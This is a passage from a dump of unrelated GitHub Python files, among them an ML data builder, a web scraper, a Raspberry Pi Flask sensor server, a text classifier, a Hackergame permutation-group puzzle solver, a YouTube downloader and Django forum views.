range(0, 12):\n # header += '@attribute typ' + str(i) + ' {0,1}\\n'\n for i in range(0, 26):\n header += '@attribute tpc' + str(i) + ' {0,1}\\n'\n for i in range(0, 100):\n header += '@attribute wrd' + str(i) + ' numeric\\n'\n # for i in range(0, 1000):\n # header += '@attribute wrd' + str(i) + ' {0,1}\\n'\n header += '\\n@data\\n'\n print(header)\n\n\ndef save_topic_list():\n topics = dict()\n questions_2 = pd.read_csv('./Porsak_data/qa_questions-refined.csv', delimiter=';')\n for i, qrow in questions_2.iterrows():\n topics[qrow['topicid']] = qrow['topic']\n df = pd.DataFrame(topics.items(), columns={'id', 'topic'})\n df.to_csv('./Porsak_data/topic_list.csv', columns={'topic', 'id'}, index=False)\n\n\ndef read_w2v_data():\n w2v = dict()\n # with open('./word2vec/IRBlog/blog.fa.text.300.vec', 'r', encoding='utf-8') as infile:\n with open('./word2vec/Mixed/twitt_wiki_ham_blog.fa.text.100.vec', 'r', encoding='utf-8') as infile:\n first_line = True\n for line in infile:\n if first_line:\n first_line = False\n continue\n tokens = line.split()\n w2v[tokens[0]] = [float(el) for el in tokens[1:]]\n if len(w2v[tokens[0]]) != 300: # 100:\n print('Bad line!')\n\n # with open('./word2vec/IRBlog/w2v_per_300.pkl', 'wb') as outfile:\n with open('./word2vec/Mixed/w2v_per.pkl', 'wb') as outfile:\n pickle.dump(w2v, outfile)\n\n\ndef create_w2v_vectors():\n # with open('./word2vec/IRBlog/w2v_per_300.pkl', 'rb') as infile:\n with open('./word2vec/Mixed/w2v_per.pkl', 'rb') as infile:\n w2v = pickle.load(infile)\n w2v_length = 100 # 300\n stop_words = set(pd.read_csv('./Primary_data/PersianStopWordList.txt', header=None)[0])\n questions = pd.read_csv('./Primary_data/result_filtered.csv', delimiter=';')\n\n train = QuickDataFrame(['w' + str(i) for i in range(0, w2v_length)])\n\n prog = Progresser(questions.shape[0])\n # build the train data\n for i, qrow in questions.iterrows():\n prog.count()\n sum_array = np.zeros(w2v_length)\n number_of_words = 0\n\n for word in tokenise(qrow['sentence']):\n if word not in stop_words and word in w2v:\n number_of_words += 1\n sum_array += w2v[word]\n if i != len(train):\n print('wat?!!')\n train.append(list(sum_array / number_of_words))\n\n train.to_csv('./Primary_data/w2v-100_vector_Q.csv')\n # train.to_csv('./Primary_data/w2v-300_vector_Q.csv')\n\n\ndef create_sentence_files():\n stop_words = set(pd.read_csv('./Primary_data/PersianStopWordList.txt', header=None)[0])\n questions = QuickDataFrame.read_csv('./Primary_data/result_filtered.csv', sep=';')\n topics = QuickDataFrame.read_csv('./Primary_data/topic_vector_Q.csv')\n\n files = dict()\n for tpc in topics.cols:\n files[tpc + '-p'] = open('./Primary_data/sent_topic/' + tpc + '.p', 'w', encoding='utf-8')\n files[tpc + '-n'] = open('./Primary_data/sent_topic/' + tpc + '.n', 'w', encoding='utf-8')\n\n prog = Progresser(len(questions['sentence']))\n # build the train data\n for i, qrow in enumerate(questions['sentence']):\n prog.count()\n snt = []\n for word in tokenise(qrow):\n if word not in stop_words:\n snt.append(word)\n snt = ' '.join(snt)\n for tpc in topics.cols:\n if topics[tpc][i] == '0':\n files[tpc + '-n'].write(snt + '\\n')\n elif topics[tpc][i] == '1':\n files[tpc + '-p'].write(snt + '\\n')\n else:\n print(\"wattt\")\n\n for fl in files.values():\n fl.close()\n\n\ndef create_word_to_index():\n questions = pd.read_csv('./Primary_data/questions.txt', delimiter=';', header=None)[0].values\n w2i = {}\n for q in questions:\n for word in q.split():\n try:\n w2i[word] += 1\n except:\n w2i[word] = 1\n w2i_sorted = sorted(w2i.items(), key=lambda tup: tup[1],reverse=True)\n with open('./Primary_data/word_to_index.csv', 'w', encoding='utf-8') as outf:\n for i, w in enumerate(w2i_sorted):\n outf.write(w[0] + ',' + str(i+1) + '\\n')\n\n\n# create_arff_header()\n# concat_word2vec_subjs()\n# concat_word2vec_types()\n\n# create_1000word_vector()\n# create_type_vector()\n# create_topic_vector()\n# concat_1000vec_type_cat()\n# concat_all()\n\n# save_topic_list()\n\n# read_w2v_data()\n# create_w2v_vectors()\n\n# create_sentence_files()\n# create_clean_questions()\ncreate_word_to_index()\n","repo_name":"AmirAhmadHabibi/TheSuperQuestionTypeTopicClassifier","sub_path":"training_data_builder.py","file_name":"training_data_builder.py","file_ext":"py","file_size_in_byte":12862,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"44"} +{"seq_id":"7047099036","text":"from selenium import webdriver\nimport time\n\nfrom selenium.webdriver.firefox.options import Options\n\n# hiding browser\noptions = webdriver.FirefoxOptions()\noptions.add_argument('-headless')\n\n# driver and url loading\ngeckodriver = 'D:\\Python\\geckodriver.exe'\ndriver = webdriver.Firefox(executable_path=geckodriver, options=options)\nlinks = []\nurls = ['https://www.betexplorer.com/next/soccer/','https://www.betexplorer.com/next/hockey/']\n\n# time to compare\nt = time.localtime()\ncurrent_time = time.strftime(\"%H:%M\", t)\n\nurl_dict = {}\nfor url in urls:\n driver.get(url)\n # scraping match links from url\n elements = driver.find_elements_by_class_name(\"table-main__tt [href]\")\n dates = driver.find_elements_by_class_name(\"table-main__time\")\n\n for date, element in zip(dates, elements):\n key = date.text\n if key > current_time:\n url_dict.setdefault(key, [])\n url_dict[key].append(element.get_attribute('href'))\n\n for links_list in url_dict.values():\n #print(links)\n for link in links_list:\n links.append(link)\n\n \"\"\"\n links_subpage = [link.get_attribute('href') for link in elements]\n for link in links_subpage:\n links.append(link)\n\n #links = (link for link in links_subpage)\n \"\"\"\n\nprint(\"links scrapped\")\ndriver.quit()\n\n\n\"\"\"\ndef execute(links):\n for link in links:\n driver = load_driver(link)\n match = get_match(driver)\n date = get_date(driver)\n if not odds_exist_check(driver)\n continue\n rows = get_rows(driver)\n cells = get_cells(driver)\n rows = row_truncate(rows)\n cells = fix_cell_list(cells)\n odds_objects = store_in_class(rows, cells, dictionary_home, dictionary_draw, dictionary_away)\n sort_by_odds(dictionary)\n get_best_odd(dictionary)\n Mecz = BestBet(match, date, get_best_odd(dictionary_home), ...)\n save_results(file, Mecz)\n \n \n\"\"\"","repo_name":"Kuba799/Data-Scraper","sub_path":"link_scraper.py","file_name":"link_scraper.py","file_ext":"py","file_size_in_byte":1955,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"42789637444","text":"import os\nimport sys\nsys.path.append(os.path.join(os.path.dirname(__file__), \"..\"))\nfrom common.Puzzle import Puzzle\n\nclass Puzzle04(Puzzle, year=2022, day=4):\n @staticmethod\n def process_input(data):\n return [(tuple(map(int, assignments[0].split('-'))), tuple(map(int, assignments[1].split('-')))) for assignments in [pair.split(',') for pair in data]]\n\n def solve_part_1(self): # Solution for part 1\n res = 0\n for pair in self.data:\n ar = tuple(range(pair[0][0], pair[0][1]+1))\n br = tuple(range(pair[1][0], pair[1][1]+1))\n if(ar[0] <= br[0] and ar[-1] >= br[-1]):\n res += 1\n continue\n if(br[0] <= ar[0] and br[-1] >= ar[-1]):\n res += 1\n continue\n return res\n\n def solve_part_2(self): # Solution for part 2\n res = 0\n for pair in self.data:\n br = tuple(range(pair[1][0], pair[1][1]+1))\n for a in range(pair[0][0], pair[0][1]+1):\n if(a in br):\n res += 1\n break\n return res\n\nif(__name__ == \"__main__\"):\n puzzle = Puzzle04()\n part1, part2 = puzzle.solve()\n print(f\"Advent of Code {puzzle.year} day {puzzle.day}:\")\n print(f\"- Part 1: {part1}\")\n print(f\"- Part 2: {part2}\")\n","repo_name":"Skulhunter5/advent-of-code","sub_path":"Python/2022/puzzle04.py","file_name":"puzzle04.py","file_ext":"py","file_size_in_byte":1325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"16884867503","text":"from flask import Flask, render_template, request\nfrom gevent.wsgi import WSGIServer\nimport Adafruit_DHT\nimport RPi.GPIO as GPIO\nimport id_generation\nimport requests\nimport json\nimport time\n\nWEB_SERVER_IP = \"127.0.0.1\"\nWEB_SERVER_PORT = 8080\nINITIAL_PEER_IP = \"127.0.0.1\"\nINITIAL_PEER_PORT = 5000\n\n# in Board mode\nLED_PIN = 7\nMOTION_PIN = 11\n\napp = Flask(__name__)\n\n\n@app.route(\"/\")\ndef render_root():\n humidity, temperature = Adafruit_DHT.read_retry(Adafruit_DHT.DHT22, 12)\n nearby = bool(GPIO.input(MOTION_PIN))\n return render_template(\"index.html\", temperature=temperature,\n humidity=humidity,\n nearby=nearby)\n\n\n@app.route(\"/pi/sensors/temperature/0/\")\ndef get_temperature():\n humidity, temperature = Adafruit_DHT.read_retry(Adafruit_DHT.DHT22, 12)\n return json.dumps([time.time(), temperature])\n\n\n@app.route(\"/pi/sensors/humidity/0/\")\ndef get_humidity():\n humidity, temperature = Adafruit_DHT.read_retry(Adafruit_DHT.DHT22, 12)\n return json.dumps([time.time(), humidity])\n\n\n@app.route(\"/pi/sensors/motion/0/\")\ndef get_motion():\n return json.dumps([time.time(), GPIO.input(MOTION_PIN)])\n\n\n@app.route(\"/pi/actuators/leds/0/\", methods=[\"POST\"])\ndef handle_led_set_value():\n value = GPIO.LOW if request.form[\"value\"] == \"0\" else GPIO.HIGH\n GPIO.output(LED_PIN, value)\n return \"OK\"\n\n\ndef connect_sensor_to_kademlia(sensor_url, description):\n sensor_id = id_generation.generate_id(sensor_url)\n headers = {\"node_id\": str(sensor_id), \"url\": sensor_url, \"description\": description}\n url = \"http://%s:%d/api/wotds/registration/\" % (INITIAL_PEER_IP, INITIAL_PEER_PORT)\n requests.get(url, headers=headers)\n\n\ndef connect_sensors_to_kademlia():\n my_url = \"http://%s:%d\" % (WEB_SERVER_IP, WEB_SERVER_PORT)\n connect_sensor_to_kademlia(my_url + \"/pi/sensors/humidity/0/\", \"Humidity Sensor\")\n connect_sensor_to_kademlia(my_url + \"/pi/sensors/temperature/0/\", \"Temperature Sensor\")\n connect_sensor_to_kademlia(my_url + \"/pi/sensors/motion/0/\", \"Motion Sensor\")\n\n\ndef main():\n GPIO.setwarnings(False)\n GPIO.setmode(GPIO.BOARD)\n GPIO.setup(MOTION_PIN, GPIO.IN)\n GPIO.setup(LED_PIN, GPIO.OUT)\n\n connect_sensors_to_kademlia()\n\n http_server = WSGIServer(('', WEB_SERVER_PORT), app)\n http_server.serve_forever()\n\n # app.run(host=\"0.0.0.0\", port=WEB_SERVER_PORT, threaded=True)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"steffen555/dBIoTP2PC","sub_path":"milestone4/sensors.py","file_name":"sensors.py","file_ext":"py","file_size_in_byte":2429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"17234513533","text":"# -*- coding: utf-8 -*-\nfrom urlparse import urlsplit\nfrom lxml.html import tostring, fromstring, HTMLParser\nfrom lxml.html.clean import Cleaner\n\n\ndef html_link(url):\n host = urlsplit(url).hostname\n return u'<a href=\"%s\">%s</a>' % (url, host)\n\n\ndef render_html(node, encoding='utf-8', make_unicode=False):\n \"\"\"\n Render Element node.\n \"\"\"\n if make_unicode or encoding == 'unicode':\n return tostring(node, encoding='utf-8').decode('utf-8')\n else:\n return tostring(node, encoding=encoding)\n\n\ndef parse_html(html, encoding='utf-8'):\n \"\"\"\n Parse html into ElementTree node.\n \"\"\"\n parser = HTMLParser(encoding=encoding)\n return fromstring(html, parser=parser)\n\n\ndef clean_html(html, safe_attrs=('src', 'href'), encoding='utf-8'):\n \"\"\"\n Fix HTML structure and remove non-allowed attributes from all tags.\n Return UTF-8 HTML.\n \"\"\"\n\n # Conver HTML to Unicode\n html = render_html(parse_html(html, encoding=encoding), make_unicode=True)\n\n # Strip some shit with default lxml tools\n cleaner = Cleaner(page_structure=True)\n html = cleaner.clean_html(html)\n\n # Keep only allowed attributes\n tree = parse_html(html)\n for elem in tree.xpath('.//*'):\n for key in elem.attrib.keys():\n if key not in safe_attrs:\n del elem.attrib[key]\n\n return render_html(tree)\n","repo_name":"indexofire/gork","sub_path":"src/gork/application/feedz/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"37866749146","text":"class Team:\r\n def __init__(self,ma,tenTeam,tenTruong):\r\n self.ma=ma\r\n self.tenTeam=tenTeam\r\n self.tenTruong=tenTruong\r\n\r\nclass ThiSinh:\r\n def __init__(self,ma,ten,team: Team):\r\n self.ma=ma\r\n self.ten=ten\r\n self.team=team\r\n def __str__(self):\r\n return self.ma+' '+self.ten+' '+self.team.tenTeam+' '+self.team.tenTruong\r\na=[]\r\nd={}\r\nfor i in range(int(input())):\r\n ma=\"Team%02d\"%(i+1)\r\n tenTeam=input()\r\n tenTruong=input()\r\n d[ma]=Team(ma,tenTeam,tenTruong)\r\nfor i in range(int(input())):\r\n ma=\"C%03d\"%(i+1)\r\n ten=input()\r\n maTeam=input()\r\n ts=ThiSinh(ma,ten,d[maTeam])\r\n a.append(ts)\r\na.sort(key=lambda x: x.ten)\r\nfor i in a:\r\n print(i)\r\n\r\n'''\r\n2\r\nBAV_MIS\r\nBanking Academy of Vietnam\r\nFTU Knights1\r\nForeign Trade University\r\n6\r\nLe Trung Toan\r\nTeam01\r\nNguyen Trinh Quoc Long\r\nTeam01\r\nGiang Minh Tung\r\nTeam01\r\nNguyen Hang Giang\r\nTeam02\r\nNguyen Thanh Nhan\r\nTeam02\r\nNguyen Viet Duc\r\nTeam02\r\n'''","repo_name":"Nauh24/Python_PTIT","sub_path":"PYKT096-DANH SÁCH THI LẬP TRÌNH.py","file_name":"PYKT096-DANH SÁCH THI LẬP TRÌNH.py","file_ext":"py","file_size_in_byte":978,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"43174858719","text":"#!/usr/bin/python\n\nimport csv\nimport sys\nimport re\nimport fileinput\n\nre_0 = re.compile(r'^(...)(.*)$')\nre_10 = re.compile(r'^([^ ]+) +(.*)$')\nre_11 = re.compile(r'^([^ ]+) +([^ ]+) +(.+), +(.*)$')\nre_20 = re.compile(r'^(.*)$')\nre_21 = re.compile(r'^([^ ]+) +(.+), +(.*)$')\n\ndef parse(fn, wr):\n f=open(fn,'r')\n lines=[x.strip('\\n') for x in f.readlines()]\n empty4=(\"\",\"\",\"\",\"\")\n empty3=(\"\",\"\",\"\")\n l1 = empty4\n l2 = empty4\n l3 = empty4\n state = 0\n d1 = \"\"\n d2 = \"\"\n d3 = \"\"\n i = 0\n n = 0\n rows = []\n while i < len(lines):\n m = re_0.match(lines[i])\n if m is not None:\n if m.group(1) == '###':\n state = 1\n mm = re_10.match(m.group(2))\n if mm is not None:\n mmm = re_11.match(m.group(2))\n if mmm is not None:\n l1 = (mmm.group(1), mmm.group(2), mmm.group(3), mmm.group(4))\n else:\n l1 = (mm.group(1), mm.group(2), \"\", \"\")\n l2 = empty4\n l3 = empty4\n d2 = \"\"\n d3 = \"\"\n else:\n print(\"!!# Not match [%d] %s\" % (i, lines[i]))\n return None\n elif m.group(1) == '@@@':\n state = 2\n mm = re_10.match(m.group(2))\n if mm is not None:\n mmm = re_11.match(m.group(2))\n if mmm is not None:\n l2 = (mmm.group(1), mmm.group(2), mmm.group(3), mmm.group(4))\n else:\n l2 = (mm.group(1), mm.group(2), \"\", \"\")\n l3 = empty4\n d3 = \"\"\n else:\n print(\"!!@ Not match [%d] %s\" % (i, lines[i]))\n return None\n elif m.group(1) == '$$$':\n state = 3\n mm = re_10.match(m.group(2))\n if mm is not None:\n mmm = re_11.match(m.group(2))\n if mmm is not None:\n l3 = (mmm.group(1), mmm.group(2), mmm.group(3), mmm.group(4))\n else:\n l3 = (mm.group(1), mm.group(2), \"\", \"\")\n else:\n print(\"!!$ Not match [%d] %s\" % (i, lines[i]))\n return None\n elif m.group(1) == '===':\n state = 4\n mm = re_20.match(m.group(2))\n if mm is not None:\n mmm = re_21.match(m.group(2))\n if mmm is not None:\n l4 = (mmm.group(1), mmm.group(2), mmm.group(3))\n else:\n l4 = (mm.group(1), \"\", \"\")\n else:\n print(\"!!= Not match [%d] %s\" % (i, lines[i]))\n return None\n i = i+1\n n = n+1\n row = [n, l1[0], l1[1], l1[2], l1[3], d1, l2[0], l2[1], l2[2], l2[3], d2, l3[0], l3[1], l3[2], l3[3], d3, l4[0], l4[1], l4[2], lines[i]]\n wr.writerow(row)\n else:\n if state == 1:\n d1 = d1 + lines[i] + \"\\n\"\n elif state == 2:\n d2 = d2 + lines[i] + \"\\n\"\n elif state == 3:\n d3 = d3 + lines[i] + \"\\n\"\n i = i+1\n##\nwith open('%s.csv' % sys.argv[1], 'w') as cf:\n writer = csv.writer(cf, delimiter=',', quoting=csv.QUOTE_ALL)\n title = [\"count\", \"rank-1 label\", \"rank-1 name\", \"rank-1 author\", \"rank-1 date\", \"rank-1 description\",\n \"rank-2 label\", \"rank-2 name\", \"rank-2 author\", \"rank-2 date\", \"rank-2 description\",\n \"rank-3 label\", \"rank-3 name\", \"rank-3 author\", \"rank-3 date\", \"rank-3 description\", \n \"rank-4 name\", \"rank-4 author\", \"rank-4 date\", \"rank-4 description\"]\n writer.writerow(title)\n parse(sys.argv[1], writer)\n","repo_name":"ChangLiuGitHub/Practice-of-Classification-models-on-TIP-data","sub_path":"parse.py","file_name":"parse.py","file_ext":"py","file_size_in_byte":3306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"15615459018","text":"import sys\n\nclass RegistrarUsuario:\n\n\t#### Duda: Iniciar Registro de Usuarios aca, dentro de esta clase\n\tdef agregarUsuario(self, Usuario, RegistroUsuarios):\n\t\trepetido = self.buscarUsuario(Usuario, RegistroUsuarios)\n\t\tif not repetido: \n\t\t\tRegistroUsuarios.append(Usuario)\n\t\telse: sys.stderr.write('Fallo agregarUsuario: El Usuario ya se encuentra registrado en el Sistema \\n')\n\n\tdef buscarUsuario(self, Usuario, RegistroUsuario):\n\t\tencontrado = False\n\t\tfor unUsuario in RegistroUsuario:\n\t\t\tif unUsuario.darNombre() == Usuario.darNombre() : \n\t\t\t\tencontrado = True\n\t\treturn encontrado\n","repo_name":"jnvillar/Ing-Tps","sub_path":"Tp1/source/Deprecated/RegistrarUsuario.py","file_name":"RegistrarUsuario.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"71714255813","text":"import pandas as pd\nimport matplotlib as plt\nimport seaborn as sns\nfrom nltk.tokenize import RegexpTokenizer\nfrom nltk.stem import PorterStemmer\n\nfrom sklearn.feature_extraction.text import CountVectorizer, TfidfVectorizer\nfrom sklearn.model_selection import train_test_split, cross_val_score, GridSearchCV\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.naive_bayes import MultinomialNB\nfrom sklearn.svm import SVC, LinearSVC\n\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.metrics import classification_report\n\n\n\ndef parse_data(file_path, venue):\n data = []\n with open(file_path, 'r') as f:\n for line in f:\n tokens = line.split(\"\\t\")\n data.append(dict(conference=venue,title=tokens[2].strip()))\n return data\n\ndef tokenize(title):\n tokeizer = RegexpTokenizer(r'[a-zA-Z]\\w+')\n return tokeizer.tokenize(title)\n\ndef stemmer(words):\n stemmer = PorterStemmer()\n return \" \".join(stemmer.stem(word) for word in words)\n\nif __name__ == '__main__':\n source_path = \"/mnt/3A0F13EC43ACDB83/workspace/dblp_outputs/\"\n datasets =[\"icse\",\"vldb\"]\n data = []\n for dataset in datasets:\n data.append(parse_data(source_path+dataset+\"_id.txt\",dataset))\n\n icse = pd.DataFrame(data[0])\n vldb = pd.DataFrame(data[1])\n\n icse['class_target']=0\n vldb['class_target']=1\n df_list = [icse,vldb]\n df = pd.concat(df_list).reset_index(drop=True)\n\n df['tokens'] = df['title'].map(tokenize)\n df['stems'] = df['tokens'].map(stemmer)\n\n # print(df.sample(10))\n x = df['stems']\n y = df['class_target']\n\n X_train, X_test, Y_train, Y_test = train_test_split(x, y, test_size =0.25, random_state=5)\n\n # print(len(X_train), len(X_test))\n # print(len(Y_train), len(Y_test))\n \n mnnb_pipe = Pipeline(steps=[('tf',TfidfVectorizer()),('mnnb',MultinomialNB())])\n mnnb_grid = {\n 'tf__max_features' :[2000,3000,5000],\n 'tf__stop_words' :['english'],\n 'tf__ngram_range':[(1,1),(1,2)],\n 'tf__use_idf' :[True,False],\n 'mnnb__alpha' :[0.1, 0.5, 1]\n }\n \n mnnb_gs = GridSearchCV(mnnb_pipe, mnnb_grid, n_jobs=-1)\n mnnb_gs.fit(X_train, Y_train)\n\n # print(mnnb_gs.score(X_train, Y_train))\n # print(mnnb_gs.score(X_test, Y_test))\n # print(mnnb_gs.best_params_) #best parameters\n \n mnnb_pred = mnnb_gs.predict(X_test)\n # df['predicts'] = mnnb_pred\n # print(df.sample(30))\n\n mnnb_conf = confusion_matrix(Y_test,mnnb_pred)\n # print(\"MNNB Cnf []: \\n\",mnnb_conf)\n mnnb_heatmap = sns.heatmap(mnnb_conf, cmap=\"YlGnBu\", annot=True, square=True, fmt=\".0f\").get_figure()\n mnnb_heatmap.savefig('mnnb_heatmap.png',dpi=400)\n \n print(classification_report(Y_test,mnnb_pred))\n\n svc_pipe = Pipeline(steps=[('tf',TfidfVectorizer()),('svc',SVC())])\n svc_grid = {\n 'tf__max_features' :[2000,3000,5000],\n 'tf__stop_words' :['english'],\n 'tf__ngram_range':[(1,1),(1,2)],\n 'tf__use_idf' :[True,False],\n 'svc__C' :[3,5],\n 'svc__tol' :[1e-3,1e-5],\n 'svc__class_weight':[{0:0.05,1:0.8},{0:0.07,1:1}]\n }\n \n svc_gs = GridSearchCV(svc_pipe, svc_grid, n_jobs=-1)\n svc_gs.fit(X_train, Y_train)\n # print(\"Best svc params:\\n\",svc_gs.best_params_)\n svc_pred = svc_gs.predict(X_test)\n svc_conf = confusion_matrix(Y_test,svc_pred)\n svc_heatmap = sns.heatmap(svc_conf, cmap=\"YlGnBu\", annot=True, square=True, fmt=\".0f\").get_figure()\n svc_heatmap.savefig('svc_heatmap.png',dpi=400)\n \n print(classification_report(Y_test,svc_pred))\n\n # print(X_train.sample(20))\n \n\n\n","repo_name":"bfoysal/comp8380_python","sub_path":"classifiacation.py","file_name":"classifiacation.py","file_ext":"py","file_size_in_byte":3579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"27110176209","text":"# XXX slow. but works.\n# target = 10\ntarget = 2000000\nprimes = [2,3]\n\ndef is_prime(i):\n for p in primes:\n if i % p == 0:\n return False\n return True\n\ni = max(primes)+2\nwhile i<target:\n if is_prime(i):\n primes.append(i)\n print(i)\n i += 2\nprint(sum(primes))\n\n","repo_name":"tokuhirom/project-euler","sub_path":"010.py","file_name":"010.py","file_ext":"py","file_size_in_byte":300,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"2619361724","text":"import streamlit as st\n\nfrom pathlib import Path\nfrom youtube import Downloader\n\nst.title('YouTube Downloader')\n\n\"\"\"\nDownload videos or entire playlists from youtube. \nYou can specify if you want only audio, the video or both \nin separated files.\n\"\"\"\n\n\"\"\"\nWhat do you want to download?\n\"\"\"\n\nselection = st.selectbox(\"\", ['Video', 'Playlist'])\n\nlink = st.text_input(f'Add the link of your {selection}')\n\n\"\"\"\nChoose download type\n- Video: Normal youtube video\n- Only Audio: Just the audio of the youtube video \n- Audio and Video: This option downloads the audio and the video\nin separate files.\n\n#### Note: \n- If you are downloading a playlist, these options apply to every link\n- If the resolution is not available, it will download the highest\n\"\"\"\n\ndownload_type, resolution = st.beta_columns(2)\n\nwith download_type:\n download_selection = st.selectbox(\"Download Type\", ['Video', 'Only Audio', 'Audio and Video'])\n\nwith resolution:\n quality = st.selectbox(\"Quality\", ['highest', '720p', '480p', '320p', '240p', '144p'])\n\nif st.button('Download'):\n if selection == 'Playlist':\n playlist = True\n else:\n playlist = False\n if download_selection == 'Video':\n video = True\n audio = False\n elif download_selection == 'Only Audio':\n video = False\n audio = True\n else:\n video = True\n audio = True\n\n info = st.empty()\n\n downloader = Downloader(link, video=video, audio=audio, playlist=playlist, quality=quality, convert=True)\n\n info.info('Downloading...')\n downloader.download()\n text = f\"\"\"\n The download was successful \n Search for it at: {'./youtube_downloader/downloads/'}\n \"\"\"\n info.success(text)\n\n\n\n\n\n\n","repo_name":"JonathanElejalde/youtube_downloader","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"11000043276","text":"import re\nimport sys\nfrom pwn import remote\nfrom permutation_group import permutation_element\nfrom sympy.ntheory.modular import crt\n\n\ndef calc(g, y):\n all_v = []\n all_m = []\n\n for subp in g.standard_tuple:\n n_mapping = dict()\n res2 = []\n\n for i, n in enumerate(subp, start=1):\n n_mapping[n] = i\n res2.append(y.permutation_list[n - 1])\n\n res1 = list(range(2, len(subp) + 1))\n res1.append(1)\n\n res2 = [n_mapping[i] for i in res2]\n\n p1 = permutation_element(len(subp), res1)\n p2 = permutation_element(len(subp), res2)\n\n acc = p1\n\n for i in range(p1.order()):\n if acc == p2:\n all_v.append(i + 1)\n all_m.append(p1.order())\n\n acc = acc * p1\n\n result, _ = crt(all_m, all_v)\n return result\n\n\nconn = remote(\"202.38.93.111\", 10114)\n\nconn.recvuntil(b'Please input your token: ')\nconn.sendline(sys.argv[1].encode())\n\nconn.recvuntil(b\"> your choice: \")\nconn.sendline(b\"2\")\n\nfor i in range(15):\n conn.recvuntil(b\"[+] DH public key: \")\n data = conn.recvline()\n n, *g_list = [int(x) for x in re.findall(rb'\\b\\d+\\b', data)]\n\n conn.recvuntil(b\"[+] my public key = \")\n data = conn.recvline()\n y_list = [int(x) for x in re.findall(rb'\\b\\d+\\b', data)]\n\n g = permutation_element(n, g_list)\n y = permutation_element(n, y_list)\n secret = calc(g, y)\n print(secret)\n\n conn.sendline(str(secret).encode())\n conn.recvuntil(b\"> your answer: Good job\\n\")\n\nprint(conn.recvline().decode())\nconn.close()\n","repo_name":"USTC-Hackergame/hackergame2022-writeups","sub_path":"players/cvhc/置换魔群/autorun2.py","file_name":"autorun2.py","file_ext":"py","file_size_in_byte":1565,"program_lang":"python","lang":"en","doc_type":"code","stars":303,"dataset":"github-code","pt":"44"} +{"seq_id":"26543358239","text":"from django.conf import settings\nfrom django.contrib.auth import authenticate, login\nfrom django.contrib.auth.decorators import login_required\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom django.db.models import Max, Q\nfrom django.http import HttpResponse\nfrom django.shortcuts import get_object_or_404, render, redirect\n\nfrom .forms import AddPostForm, AddTopicForm, LoginForm, ProfileEditForm, \\\n UserEditForm, UserRegistrationForm\nfrom .models import Section, Topic, Post, Profile, Message\n\nimport json\nimport redis\n\n# connect to redis\nr = redis.StrictRedis(host=settings.REDIS_HOST,\n port=settings.REDIS_PORT,\n db=settings.REDIS_DB)\n\n# section views\ndef section_list(request):\n sections = Section.members.all()\n return render(request,\n 'forum/section_list.html',\n {'sections': sections})\n\n\ndef section_detail(request, section):\n section = get_object_or_404(Section,\n slug=section)\n # annotate each topic with its latest post and order the topics\n # by most recent post\n topic_list = Topic.objects.filter(\n section=section).annotate(\n latest_post=Max(\n 'topic_posts__created')).order_by('-latest_post')\n paginator = Paginator(topic_list, 5)\n page = request.GET.get('page')\n try:\n topics = paginator.page(page)\n except PageNotAnInteger:\n # If page is not an integer then deliver the first page\n topics = paginator.page(1)\n except EmptyPage:\n # If page is out of range then deliver the last page\n topics = paginator.page(paginator.num_pages)\n\n return render(request,\n 'forum/section_detail.html',\n {'section': section,\n 'page': page,\n 'topics': topics})\n\n\n# topic views\ndef topic_detail(request, section, topic):\n section = get_object_or_404(Section,\n slug=section)\n topic = get_object_or_404(Topic,\n section=section,\n slug=topic)\n # increment the total views by 1\n r.incr('topic:{}:views'.format(topic.id))\n post_list = Post.objects.filter(topic=topic)\n paginator = Paginator(post_list, 5)\n page = request.GET.get('page')\n try:\n posts = paginator.page(page)\n except PageNotAnInteger:\n # If page is not an integer then deliver the first page\n posts = paginator.page(1)\n except EmptyPage:\n # If page is out of range then deliver the last page\n posts = paginator.page(paginator.num_pages)\n\n return render(request,\n 'forum/topic_detail.html',\n {'section': section,\n 'topic': topic,\n 'page': page,\n 'posts': posts})\n\n\n@login_required\ndef add_topic(request, section):\n if request.method == 'POST':\n topic_form = AddTopicForm(request.POST)\n post_form = AddPostForm(request.POST)\n if topic_form.is_valid() and post_form.is_valid():\n cd_topic_form = topic_form.cleaned_data\n cd_post_form = post_form.cleaned_data\n\n # assign user and section to new topic\n new_topic = topic_form.save(commit=False)\n new_post = post_form.save(commit=False)\n\n topic_section = get_object_or_404(Section,\n slug=section)\n new_topic.owner = request.user\n new_topic.section = topic_section\n new_topic.save()\n\n # assign user and topic to opening post\n new_post.owner = request.user\n new_post.topic = new_topic\n new_post.save()\n\n return redirect('forum:section_detail', section)\n else:\n topic_form = AddTopicForm\n post_form = AddPostForm\n\n return render(request, 'forum/add_topic.html',\n {'topic_form': topic_form,\n 'post_form': post_form})\n\n\n# registration views\ndef register(request):\n if request.method == 'POST':\n user_form = UserRegistrationForm(request.POST)\n if user_form.is_valid():\n # create a new user object but don't save\n new_user = user_form.save(commit=False)\n # set the chosen password\n new_user.set_password(user_form.cleaned_data['password'])\n # save the user\n new_user.save()\n # create the user profile\n profile = Profile.objects.create(user=new_user)\n return render(request,\n 'registration/register_done.html',\n {'new_user': new_user})\n else:\n user_form = 